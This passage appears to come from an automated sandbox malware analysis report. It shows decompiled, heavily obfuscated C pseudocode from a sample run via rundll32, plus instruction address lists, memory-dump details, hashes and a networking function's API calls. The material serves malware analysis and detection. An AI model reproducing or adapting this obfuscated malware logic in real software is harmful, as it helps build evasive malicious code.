				_v1772 = _v1772 + 0xffffc435;
				_v1772 = _v1772 ^ 0x777a10e8;
				_v1780 = 0x481950;
				_v1780 = _v1780 >> 0xb;
				_v1780 = _v1780 | 0x104efd63;
				_v1780 = _v1780 + 0xffffd02c;
				_v1780 = _v1780 ^ 0x1043876c;
				_v1636 = 0x899427;
				_v1636 = _v1636 << 0x10;
				_v1636 = _v1636 ^ 0x942ef0bd;
				_v1812 = 0xafb495;
				_v1812 = _v1812 | 0xf73eef3e;
				_v1812 = _v1812 + 0xffffb280;
				_v1812 = _v1812 ^ 0xf7b4985a;
				_v1732 = 0xe6dab0;
				_v1732 = _v1732 + 0x38b;
				_v1732 = _v1732 | 0x5f912f35;
				_v1732 = _v1732 ^ 0x5ff91c81;
				_v1660 = 0xa1ff8d;
				_v1660 = _v1660 / _t619;
				_v1660 = _v1660 ^ 0x000a69c5;
				_v1820 = 0xd15a88;
				_v1820 = _v1820 ^ 0xcd50b9e8;
				_v1820 = _v1820 >> 0x10;
				_v1820 = _v1820 ^ 0xf9319330;
				_v1820 = _v1820 ^ 0xf933c487;
				_t675 = _v1600;
				while(1) {
					L1:
					while(1) {
						L2:
						_t620 = 0x424d9d2;
						do {
							L3:
							while(_t677 != 0x19ebf08) {
								if(_t677 == _t620) {
									_push(_v1600);
									_push(_v1808);
									_t585 = E0038D389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
									_t682 =  &(_t682[7]);
									__eflags = _t585;
									if(__eflags != 0) {
										E00381E67(_v1676, _v1836, _v1684, _v1692, _v1596);
										E00381E67(_v1828, _v1740, _v1748, _v1668, _v1592);
										_t682 =  &(_t682[6]);
									}
									L14:
									_t677 = 0x19ebf08;
									while(1) {
										L1:
										L2:
										_t620 = 0x424d9d2;
										goto L3;
									}
								}
								if(_t677 == 0x5bc69f5) {
									_t592 = E0038D2CE(_t620);
									__eflags = _t592 - E00373DE2(_t620);
									_t583 = 0x7574965;
									_t677 = 0x8166b1d;
									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
									goto L2;
								}
								if(_t677 == 0x8166b1d) {
									__eflags = _t675 - _t583;
									if(__eflags != 0) {
										_t677 = 0xd369ee2;
										continue;
									}
									_push(_t620);
									_push(_t620);
									_t606 = E0038BB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
									_t682 =  &(_t682[6]);
									__eflags = _t606;
									if(__eflags == 0) {
										L12:
										return _t606;
									}
									_t677 = 0xd369ee2;
									goto L1;
								}
								if(_t677 == 0xb42e112) {
									_t677 = 0x5bc69f5;
									continue;
								}
								if(_t677 == 0xd369ee2) {
									E0038DA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
									 *((short*)(E0037B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
									E00378969(_v1688,  &_v524, __eflags, _v1620, _v1696);
									_push(_v1632);
									_push(_v1744);
									E003747CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E0038DCF7(_v1680, 0x371328, __eflags),  &_v524, _v1776, _v1712);
									E0037A8B0(_v1704, _t598, _v1800);
									_t603 = E0037EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
									_t682 =  &(_t682[0x17]);
									__eflags = _t603;
									if(__eflags != 0) {
										_t583 = 0x7574965;
										__eflags = _t675 - 0x7574965;
										_t620 = 0x424d9d2;
										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
										continue;
									}
									goto L14;
								}
								_t696 = _t677 - 0xe2e667c;
								if(_t677 != 0xe2e667c) {
									goto L25;
								}
								_push(_v1804);
								_push( &_v1564);
								_push(_t620);
								_push(0);
								_push( &_v1596);
								_push(_v1652);
								_push(0);
								_t606 = E0037AB87(_v1796, _v1724, _t696);
								if(_t606 == 0) {
									goto L12;
								}
								E00381E67(_v1644, _v1708, _v1768, _v1788, _v1596);
								return E00381E67(_v1628, _v1772, _v1780, _v1636, _v1592);
							}
							E00381E67(_v1812, _v1732, _v1660, _v1820, _v1600);
							_t682 =  &(_t682[3]);
							_t677 = 0xe6feec1;
							_t583 = 0x7574965;
							_t620 = 0x424d9d2;
							L25:
							__eflags = _t677 - 0xe6feec1;
						} while (__eflags != 0);
						return _t583;
					}
				}
			}






























































































                                                                                                                                                            0x00386df8
                                                                                                                                                            0x00386dfe
                                                                                                                                                            0x00386e0b
                                                                                                                                                            0x00386e14
                                                                                                                                                            0x00386e1b
                                                                                                                                                            0x00386e22
                                                                                                                                                            0x00386e2d
                                                                                                                                                            0x00386e38
                                                                                                                                                            0x00386e40
                                                                                                                                                            0x00386e4b
                                                                                                                                                            0x00386e53
                                                                                                                                                            0x00386e64
                                                                                                                                                            0x00386e68
                                                                                                                                                            0x00386e6a
                                                                                                                                                            0x00386e6f
                                                                                                                                                            0x00386e74
                                                                                                                                                            0x00386e7c
                                                                                                                                                            0x00386e87
                                                                                                                                                            0x00386e92
                                                                                                                                                            0x00386e9d
                                                                                                                                                            0x00386ea8
                                                                                                                                                            0x00386eb0
                                                                                                                                                            0x00386ebb
                                                                                                                                                            0x00386ec3
                                                                                                                                                            0x00386ecb
                                                                                                                                                            0x00386ed3
                                                                                                                                                            0x00386edb
                                                                                                                                                            0x00386ee3
                                                                                                                                                            0x00386ef7
                                                                                                                                                            0x00386efc
                                                                                                                                                            0x00386f05
                                                                                                                                                            0x00386f10
                                                                                                                                                            0x00386f18
                                                                                                                                                            0x00386f20
                                                                                                                                                            0x00386f28
                                                                                                                                                            0x00386f30
                                                                                                                                                            0x00386f38
                                                                                                                                                            0x00386f43
                                                                                                                                                            0x00386f4b
                                                                                                                                                            0x00386f56
                                                                                                                                                            0x00386f5e
                                                                                                                                                            0x00386f63
                                                                                                                                                            0x00386f6b
                                                                                                                                                            0x00386f73
                                                                                                                                                            0x00386f7b
                                                                                                                                                            0x00386f80
                                                                                                                                                            0x00386f89
                                                                                                                                                            0x00386f8a
                                                                                                                                                            0x00386f8e
                                                                                                                                                            0x00386f96
                                                                                                                                                            0x00386fa1
                                                                                                                                                            0x00386fa9
                                                                                                                                                            0x00386fb4
                                                                                                                                                            0x00386fbf
                                                                                                                                                            0x00386fc7
                                                                                                                                                            0x00386fd5
                                                                                                                                                            0x00386fd9
                                                                                                                                                            0x00386fe1
                                                                                                                                                            0x00386fec
                                                                                                                                                            0x00386ff7
                                                                                                                                                            0x00387002
                                                                                                                                                            0x0038700d
                                                                                                                                                            0x00387020
                                                                                                                                                            0x00387027
                                                                                                                                                            0x00387032
                                                                                                                                                            0x0038703d
                                                                                                                                                            0x00387050
                                                                                                                                                            0x00387055
                                                                                                                                                            0x0038705e
                                                                                                                                                            0x00387069
                                                                                                                                                            0x00387071
                                                                                                                                                            0x00387079
                                                                                                                                                            0x00387081
                                                                                                                                                            0x00387089
                                                                                                                                                            0x00387094
                                                                                                                                                            0x0038709f
                                                                                                                                                            0x003870aa
                                                                                                                                                            0x003870b5
                                                                                                                                                            0x003870c0
                                                                                                                                                            0x003870cb
                                                                                                                                                            0x003870d6
                                                                                                                                                            0x003870e1
                                                                                                                                                            0x003870ec
                                                                                                                                                            0x003870fe
                                                                                                                                                            0x00387103
                                                                                                                                                            0x0038710c
                                                                                                                                                            0x00387117
                                                                                                                                                            0x0038711f
                                                                                                                                                            0x00387129
                                                                                                                                                            0x0038712c
                                                                                                                                                            0x00387130
                                                                                                                                                            0x00387138
                                                                                                                                                            0x0038714b
                                                                                                                                                            0x00387152
                                                                                                                                                            0x0038715d
                                                                                                                                                            0x00387168
                                                                                                                                                            0x00387173
                                                                                                                                                            0x0038717e
                                                                                                                                                            0x00387186
                                                                                                                                                            0x0038718e
                                                                                                                                                            0x00387193
                                                                                                                                                            0x0038719b
                                                                                                                                                            0x003871a3
                                                                                                                                                            0x003871b6
                                                                                                                                                            0x003871bd
                                                                                                                                                            0x003871c8
                                                                                                                                                            0x003871d0
                                                                                                                                                            0x003871d5
                                                                                                                                                            0x003871da
                                                                                                                                                            0x003871e2
                                                                                                                                                            0x003871ea
                                                                                                                                                            0x00387200
                                                                                                                                                            0x00387207
                                                                                                                                                            0x0038720f
                                                                                                                                                            0x0038721a
                                                                                                                                                            0x00387225
                                                                                                                                                            0x00387230
                                                                                                                                                            0x0038723b
                                                                                                                                                            0x00387248
                                                                                                                                                            0x00387249
                                                                                                                                                            0x00387253
                                                                                                                                                            0x00387257
                                                                                                                                                            0x0038725c
                                                                                                                                                            0x00387264
                                                                                                                                                            0x0038726f
                                                                                                                                                            0x0038727a
                                                                                                                                                            0x00387285
                                                                                                                                                            0x00387296
                                                                                                                                                            0x00387299
                                                                                                                                                            0x0038729d
                                                                                                                                                            0x003872a5
                                                                                                                                                            0x003872ad
                                                                                                                                                            0x003872b5
                                                                                                                                                            0x003872bd
                                                                                                                                                            0x003872c7
                                                                                                                                                            0x003872cb
                                                                                                                                                            0x003872d3
                                                                                                                                                            0x003872e6
                                                                                                                                                            0x003872ed
                                                                                                                                                            0x003872f8
                                                                                                                                                            0x00387303
                                                                                                                                                            0x0038730e
                                                                                                                                                            0x00387319
                                                                                                                                                            0x00387324
                                                                                                                                                            0x0038732c
                                                                                                                                                            0x00387344
                                                                                                                                                            0x00387348
                                                                                                                                                            0x00387350
                                                                                                                                                            0x00387363
                                                                                                                                                            0x00387366
                                                                                                                                                            0x0038736d
                                                                                                                                                            0x00387378
                                                                                                                                                            0x00387380
                                                                                                                                                            0x00387388
                                                                                                                                                            0x0038738d
                                                                                                                                                            0x00387395
                                                                                                                                                            0x0038739d
                                                                                                                                                            0x003873a8
                                                                                                                                                            0x003873b0
                                                                                                                                                            0x003873bb
                                                                                                                                                            0x003873c3
                                                                                                                                                            0x003873cb
                                                                                                                                                            0x003873d0
                                                                                                                                                            0x003873d5
                                                                                                                                                            0x003873dd
                                                                                                                                                            0x003873e8
                                                                                                                                                            0x003873f0
                                                                                                                                                            0x003873fb
                                                                                                                                                            0x0038740f
                                                                                                                                                            0x00387416
                                                                                                                                                            0x00387421
                                                                                                                                                            0x0038742e
                                                                                                                                                            0x00387432
                                                                                                                                                            0x0038743a
                                                                                                                                                            0x0038743f
                                                                                                                                                            0x00387447
                                                                                                                                                            0x0038744f
                                                                                                                                                            0x00387454
                                                                                                                                                            0x00387459
                                                                                                                                                            0x00387461
                                                                                                                                                            0x0038746e
                                                                                                                                                            0x00387472
                                                                                                                                                            0x0038747a
                                                                                                                                                            0x00387482
                                                                                                                                                            0x0038748d
                                                                                                                                                            0x00387498
                                                                                                                                                            0x003874a3
                                                                                                                                                            0x003874ab
                                                                                                                                                            0x003874b0
                                                                                                                                                            0x003874be
                                                                                                                                                            0x003874c8
                                                                                                                                                            0x003874cc
                                                                                                                                                            0x003874d4
                                                                                                                                                            0x003874df
                                                                                                                                                            0x003874f5
                                                                                                                                                            0x003874fe
                                                                                                                                                            0x00387509
                                                                                                                                                            0x00387514
                                                                                                                                                            0x0038751f
                                                                                                                                                            0x0038752a
                                                                                                                                                            0x00387532
                                                                                                                                                            0x00387537
                                                                                                                                                            0x0038753c
                                                                                                                                                            0x00387541
                                                                                                                                                            0x00387549
                                                                                                                                                            0x00387554
                                                                                                                                                            0x0038755c
                                                                                                                                                            0x00387567
                                                                                                                                                            0x00387572
                                                                                                                                                            0x0038757a
                                                                                                                                                            0x00387585
                                                                                                                                                            0x00387590
                                                                                                                                                            0x0038759d
                                                                                                                                                            0x0038759e
                                                                                                                                                            0x003875a2
                                                                                                                                                            0x003875a7
                                                                                                                                                            0x003875af
                                                                                                                                                            0x003875b7
                                                                                                                                                            0x003875c1
                                                                                                                                                            0x003875c5
                                                                                                                                                            0x003875cd
                                                                                                                                                            0x003875d5
                                                                                                                                                            0x003875e8
                                                                                                                                                            0x003875ef
                                                                                                                                                            0x003875fa
                                                                                                                                                            0x00387602
                                                                                                                                                            0x0038760a
                                                                                                                                                            0x00387612
                                                                                                                                                            0x0038761a
                                                                                                                                                            0x00387622
                                                                                                                                                            0x0038762a
                                                                                                                                                            0x0038762f
                                                                                                                                                            0x00387637
                                                                                                                                                            0x0038763f
                                                                                                                                                            0x00387647
                                                                                                                                                            0x00387652
                                                                                                                                                            0x0038765a
                                                                                                                                                            0x00387665
                                                                                                                                                            0x0038766d
                                                                                                                                                            0x00387675
                                                                                                                                                            0x0038767d
                                                                                                                                                            0x00387685
                                                                                                                                                            0x00387690
                                                                                                                                                            0x0038769b
                                                                                                                                                            0x003876a6
                                                                                                                                                            0x003876b1
                                                                                                                                                            0x003876c5
                                                                                                                                                            0x003876cc
                                                                                                                                                            0x003876d7
                                                                                                                                                            0x003876df
                                                                                                                                                            0x003876e7
                                                                                                                                                            0x003876ec
                                                                                                                                                            0x003876f4
                                                                                                                                                            0x003876fc
                                                                                                                                                            0x00387703
                                                                                                                                                            0x00387703
                                                                                                                                                            0x00387708
                                                                                                                                                            0x00387708
                                                                                                                                                            0x00387708
                                                                                                                                                            0x0038770d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038770d
                                                                                                                                                            0x00387717
                                                                                                                                                            0x0038799c
                                                                                                                                                            0x003879aa
                                                                                                                                                            0x003879ca
                                                                                                                                                            0x003879cf
                                                                                                                                                            0x003879d2
                                                                                                                                                            0x003879d4
                                                                                                                                                            0x003879fa
                                                                                                                                                            0x00387a1f
                                                                                                                                                            0x00387a24
                                                                                                                                                            0x00387a24
                                                                                                                                                            0x003878e9
                                                                                                                                                            0x003878e9
                                                                                                                                                            0x00387703
                                                                                                                                                            0x00387703
                                                                                                                                                            0x00387708
                                                                                                                                                            0x00387708
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00387708
                                                                                                                                                            0x00387703
                                                                                                                                                            0x00387723
                                                                                                                                                            0x00387977
                                                                                                                                                            0x00387983
                                                                                                                                                            0x0038798a
                                                                                                                                                            0x0038798f
                                                                                                                                                            0x00387994
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00387994
                                                                                                                                                            0x0038772f
                                                                                                                                                            0x00387913
                                                                                                                                                            0x00387915
                                                                                                                                                            0x00387957
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00387957
                                                                                                                                                            0x00387917
                                                                                                                                                            0x00387918
                                                                                                                                                            0x0038793d
                                                                                                                                                            0x00387942
                                                                                                                                                            0x00387945
                                                                                                                                                            0x00387947
                                                                                                                                                            0x003877e4
                                                                                                                                                            0x003877e4
                                                                                                                                                            0x003877e4
                                                                                                                                                            0x0038794d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038794d
                                                                                                                                                            0x0038773b
                                                                                                                                                            0x00387909
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00387909
                                                                                                                                                            0x00387747
                                                                                                                                                            0x00387804
                                                                                                                                                            0x0038783e
                                                                                                                                                            0x00387848
                                                                                                                                                            0x0038784d
                                                                                                                                                            0x00387859
                                                                                                                                                            0x003878a6
                                                                                                                                                            0x003878b8
                                                                                                                                                            0x003878dd
                                                                                                                                                            0x003878e2
                                                                                                                                                            0x003878e5
                                                                                                                                                            0x003878e7
                                                                                                                                                            0x003878f0
                                                                                                                                                            0x003878fa
                                                                                                                                                            0x003878fc
                                                                                                                                                            0x00387901
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00387901
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003878e7
                                                                                                                                                            0x0038774d
                                                                                                                                                            0x00387753
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00387759
                                                                                                                                                            0x00387764
                                                                                                                                                            0x00387765
                                                                                                                                                            0x00387766
                                                                                                                                                            0x0038776f
                                                                                                                                                            0x00387770
                                                                                                                                                            0x00387782
                                                                                                                                                            0x00387784
                                                                                                                                                            0x0038778e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003877ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003877d7
                                                                                                                                                            0x00387a49
                                                                                                                                                            0x00387a4e
                                                                                                                                                            0x00387a51
                                                                                                                                                            0x00387a56
                                                                                                                                                            0x00387a5b
                                                                                                                                                            0x00387a60
                                                                                                                                                            0x00387a60
                                                                                                                                                            0x00387a60
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038770d
                                                                                                                                                            0x00387708

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                                                            • API String ID: 0-2206596976
                                                                                                                                                            • Opcode ID: 0e4b6a5d8816974e434f407a57c7990138434ecac5ee403b2dee69e424fbd647
                                                                                                                                                            • Instruction ID: 7d5f610572507fae7e6a78bef7c0a818f97f51245f12089acb5c44a3611b482a
                                                                                                                                                            • Opcode Fuzzy Hash: 0e4b6a5d8816974e434f407a57c7990138434ecac5ee403b2dee69e424fbd647
                                                                                                                                                            • Instruction Fuzzy Hash: CA52FB715083818BD379DF21C98AB9BBBE1BBC4308F108A1DE5DA96260D7B18949CF53
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 10012C6C
                                                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                                                            • _strcat.LIBCMT ref: 10012CE9
                                                                                                                                                            • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                                                            • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                                                              • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                                              • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                                              • Part of subcall function 1001DD46: GetDlgItem.USER32(?,C7783548), ref: 1001DD53
                                                                                                                                                              • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                                                            • String ID: Connected$Disconnected$Wait...
                                                                                                                                                            • API String ID: 2263617321-2304371739
                                                                                                                                                            • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                                            • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                                                            • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                                            • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00372251 Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00372251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E00373DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
									E00380DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E00380DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E00390E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E00377FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E00380DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E00390E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E0038C631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E00380DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E00380DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
